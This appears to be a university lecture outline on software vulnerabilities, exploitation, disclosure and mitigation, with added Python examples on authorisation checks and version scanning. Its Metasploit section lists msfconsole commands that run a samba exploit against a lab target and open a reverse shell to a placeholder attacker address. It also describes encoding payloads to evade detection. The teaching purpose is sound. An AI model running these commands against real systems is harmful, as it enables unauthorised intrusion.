behaving badly

Software Vulnerabilities: Computer Security Lectures 2014/15 S2


Description

This video is part of the computer/information/cyber security and ethical hacking lecture series by Z. Cliffe Schreuders at Leeds Beckett University. Laboratory work sheets, slides, and other open educational resources are available at http://z.cliffe.schreuders.org. The slides themselves are Creative Commons licensed CC-BY-SA, and images used are licensed as individually attributed.

Topics covered in this lecture include:

Programs behaving badly
Software vulnerabilities
Exploits
Exploitation

Payloads
- A payload is the malicious code that is consequently run on the target system, if the exploit is successful

Common types of vulnerabilities / payloads
- Information leaks
- Denial of service (DoS)
- Arbitrary code execution: the attacker can run code/commands
  - Specific database/shell commands
  - The execution of machine code
    - Bind shell
    - Reverse shell

Privilege escalation
- Vertical privilege escalation: access to resources for higher privilege users or applications
- Horizontal privilege escalation: access to resources for other users or applications

Window of vulnerability
- A zero day security vulnerability is a new security problem that has been discovered

Vulnerability disclosure
- Responsible disclosure
- Full disclosure

Vulnerability reward schemes
- Google Vulnerability Rewards Program
- Reward schemes generally require 'responsible disclosure'
- Facebook Responsible Disclosure Policy
- Others such as TippingPoint, Secunia, and iDefense will pay for exploits against popular vendors
- Bugcrowd

Project Zero
- In 2014 Google started Project Zero

Auditing and permission
- "Ethical hacking" basically means you have legal permission to do a security audit

Updating
- Keeping software up-to-date so that you have all the vendor-supplied fixes

Patching
- Could be source or binary changes

More mitigation...
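The two kinds of privilege escalation named above come down to a missing authorisation check in application code. The following is an added example, not material from the lecture or its slides: a constructed toy record store with users, roles and records (the names alice, bob and root, the record bodies and the helper functions are all made up for this illustration). Each operation is shown twice, once without the check, where an ordinary user can read another user's record (horizontal escalation) or promote themselves to administrator (vertical escalation), and once with the ownership and role checks that close the hole.

```python
from dataclasses import dataclass
from typing import Callable, Dict

# Constructed sample data for this example: two ordinary users, one
# administrator, and two records that each belong to a single user.
@dataclass
class User:
    name: str
    role: str  # "user" or "admin"

@dataclass
class Record:
    owner: str
    body: str

def sample_users() -> Dict[str, User]:
    """Fresh copy of the sample user table, so each demo step starts clean."""
    return {
        "alice": User("alice", "user"),
        "bob": User("bob", "user"),
        "root": User("root", "admin"),
    }

RECORDS: Dict[int, Record] = {
    1: Record(owner="alice", body="alice's private notes"),
    2: Record(owner="bob", body="bob's private notes"),
}

class AccessDenied(Exception):
    """Raised when an authorisation check fails."""

# --- Horizontal privilege escalation: reaching another user's resources ---

def read_record_vulnerable(user: User, record_id: int) -> str:
    # Checks only that the record exists. Bob asking for record_id=1
    # receives Alice's data: horizontal privilege escalation.
    return RECORDS[record_id].body

def read_record_checked(user: User, record_id: int) -> str:
    record = RECORDS[record_id]
    # Ownership check, with an explicit allowance for administrators.
    if record.owner != user.name and user.role != "admin":
        raise AccessDenied(f"{user.name} may not read record {record_id}")
    return record.body

# --- Vertical privilege escalation: reaching a higher-privilege capability ---

def set_role_vulnerable(users: Dict[str, User], actor: User,
                        target: str, new_role: str) -> str:
    # Trusts whatever the request says: an ordinary user can promote
    # themselves to "admin". The actor parameter is never consulted.
    users[target].role = new_role
    return users[target].role

def set_role_checked(users: Dict[str, User], actor: User,
                     target: str, new_role: str) -> str:
    # Only an existing administrator may change roles.
    if actor.role != "admin":
        raise AccessDenied(f"{actor.name} may not change roles")
    users[target].role = new_role
    return users[target].role

def attempt(fn: Callable, *args) -> str:
    """Run one operation and report its result, or 'denied' if it was refused."""
    try:
        return fn(*args)
    except AccessDenied:
        return "denied"

def demo() -> Dict[str, str]:
    """Exercise each operation as Bob (ordinary user) and as root (admin)."""
    users = sample_users()
    bob, root = users["bob"], users["root"]
    return {
        "bob_reads_alice_vulnerable": attempt(read_record_vulnerable, bob, 1),
        "bob_reads_alice_checked": attempt(read_record_checked, bob, 1),
        "bob_reads_own_checked": attempt(read_record_checked, bob, 2),
        "admin_reads_alice_checked": attempt(read_record_checked, root, 1),
        "bob_promotes_self_vulnerable":
            attempt(set_role_vulnerable, sample_users(), bob, "bob", "admin"),
        "bob_promotes_self_checked":
            attempt(set_role_checked, sample_users(), bob, "bob", "admin"),
        "admin_promotes_bob_checked":
            attempt(set_role_checked, users, root, "bob", "admin"),
    }

if __name__ == "__main__":
    for step, outcome in demo().items():
        print(f"{step:32s} -> {outcome}")
```

The design point is that both checks sit inside the operation itself rather than in the caller: whoever invokes read_record_checked or set_role_checked gets the same decision, so a forgotten check in one code path cannot reopen the escalation.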
Vulnerability analysis scanning
- Checking against databases of known vulnerabilities (automated using tools such as Nessus, or manually checking advisories)

Penetration testing...

Metasploit framework (MSF)
- Developed by HD Moore
- The framework is FOSS, with some proprietary interfaces, now owned by Rapid7
- Highly modular: can easily combine different exploits and payloads
- Much more flexible than the manual method of altering exploits programmed in C
- Includes an extensive library of modules: exploits, payloads, encoding, post-exploitation actions

MSF exploits
- MSF contains over 1000 exploits, including:
  - OS flaws: Windows, Linux, Mac, ...
  - Services: Apache, IIS, ...
  - Applications: Adobe Reader, IE, Firefox, ...
  - Web apps: some new support

MSF payloads
- MSF contains many payloads: msfpayload -l | less
- Most target specific platforms
- Bind or reverse shells, VNC, etc.

MSF encode
- MSF can encode exploits/payloads to avoid detection
  - Alternative instructions
  - Encrypt instructions, along with decrypt code
- Similar to how polymorphic viruses avoid detection
- Can also bind and convert payloads to executables
- Lots of encoding methods: msfencode -l

MSF interfaces
- Msfcli: command line
- Msfconsole: console (very powerful)
- Metasploit Community / Pro: proprietary web interfaces and additional tools
- Armitage: FOSS GUI

Steps of using MSF to exploit
1. Specify the exploit to use
2. Set options for the exploit (such as the IP address of the computer to attack)
3. Choose a payload (this defines what we end up doing on the compromised system)
4. Optionally choose encoding to evade security monitoring such as anti-malware, intrusion detection systems (IDS), and so on
5. Launch the exploit

Example (vs Metasploitable)
  use exploit/multi/samba/usermap_script
  show options
  set RHOST {Metasploitable-IP-Address}
  show payloads
  set PAYLOAD cmd/unix/reverse
  set LHOST {Your-Kali-IP-Address}
  set LPORT {Your-Choice-of-Port}
  check
  exploit

Malware and vulnerabilities
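The "vulnerability analysis scanning" point above, checking installed software against a database of known vulnerabilities, is what scanners such as Nessus automate. The following is an added example and not code from the lecture or from any scanner: a minimal version-based check in Python. The installed-package list is a constructed sample in the "name<TAB>version" shape that dpkg-query -W prints, and the advisory database is constructed with placeholder identifiers (ADV-EXAMPLE-000x), not real advisories. A package is flagged when its upstream version is older than the version the advisory says fixed the problem.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample of installed packages (made-up versions), in the
# tab-separated "name<TAB>version" layout produced by `dpkg-query -W`.
INSTALLED = """\
openssl\t1.0.1e-2
samba\t3.0.20-1
apache2\t2.4.10-1
bash\t4.3-11
"""

# Constructed advisory database with placeholder identifiers. Each entry
# records the package concerned and the first upstream version that fixes it.
ADVISORIES = [
    {"id": "ADV-EXAMPLE-0001", "package": "openssl", "fixed_in": "1.0.1g",
     "summary": "information leak (constructed entry)"},
    {"id": "ADV-EXAMPLE-0002", "package": "samba", "fixed_in": "3.0.25",
     "summary": "arbitrary command execution (constructed entry)"},
    {"id": "ADV-EXAMPLE-0003", "package": "apache2", "fixed_in": "2.4.4",
     "summary": "denial of service (constructed entry)"},
]

def parse_installed(text: str) -> Dict[str, str]:
    """Map package name -> version from tab-separated lines."""
    installed = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        name, version = line.split("\t", 1)
        installed[name.strip()] = version.strip()
    return installed

def upstream_version(version: str) -> str:
    """Strip a leading Debian epoch ('1:') and trailing revision ('-2')."""
    no_epoch = version.split(":", 1)[-1]
    return no_epoch.rsplit("-", 1)[0]

def version_key(version: str) -> Tuple:
    """Comparable key: digit runs compare numerically, letter runs lexically.
    Simplification: '~' pre-release markers and other dpkg ordering rules
    are not modelled; dpkg --compare-versions is authoritative on a real host."""
    parts = re.findall(r"\d+|[A-Za-z]+", version)
    return tuple((int(p), "") if p.isdigit() else (-1, p) for p in parts)

def scan(installed_text: str, advisories: List[dict]) -> List[dict]:
    """Return one finding per advisory whose package is installed and unfixed."""
    installed = parse_installed(installed_text)
    findings = []
    for adv in advisories:
        version = installed.get(adv["package"])
        if version is None:
            continue  # package not present, advisory does not apply
        if version_key(upstream_version(version)) < version_key(adv["fixed_in"]):
            findings.append({
                "id": adv["id"],
                "package": adv["package"],
                "installed": version,
                "fixed_in": adv["fixed_in"],
                "summary": adv["summary"],
            })
    return findings

if __name__ == "__main__":
    for f in scan(INSTALLED, ADVISORIES):
        print(f"{f['id']}: {f['package']} {f['installed']} "
              f"(fixed in {f['fixed_in']}) - {f['summary']}")
```

Two caveats a practitioner would keep in mind: versions must be compared numerically per component (2.4.10 is newer than 2.4.4, which a plain string comparison gets wrong), and a distribution may backport a fix without changing the upstream version, so a purely version-based check produces false positives unless the advisory data is specific to the distribution's own package versions.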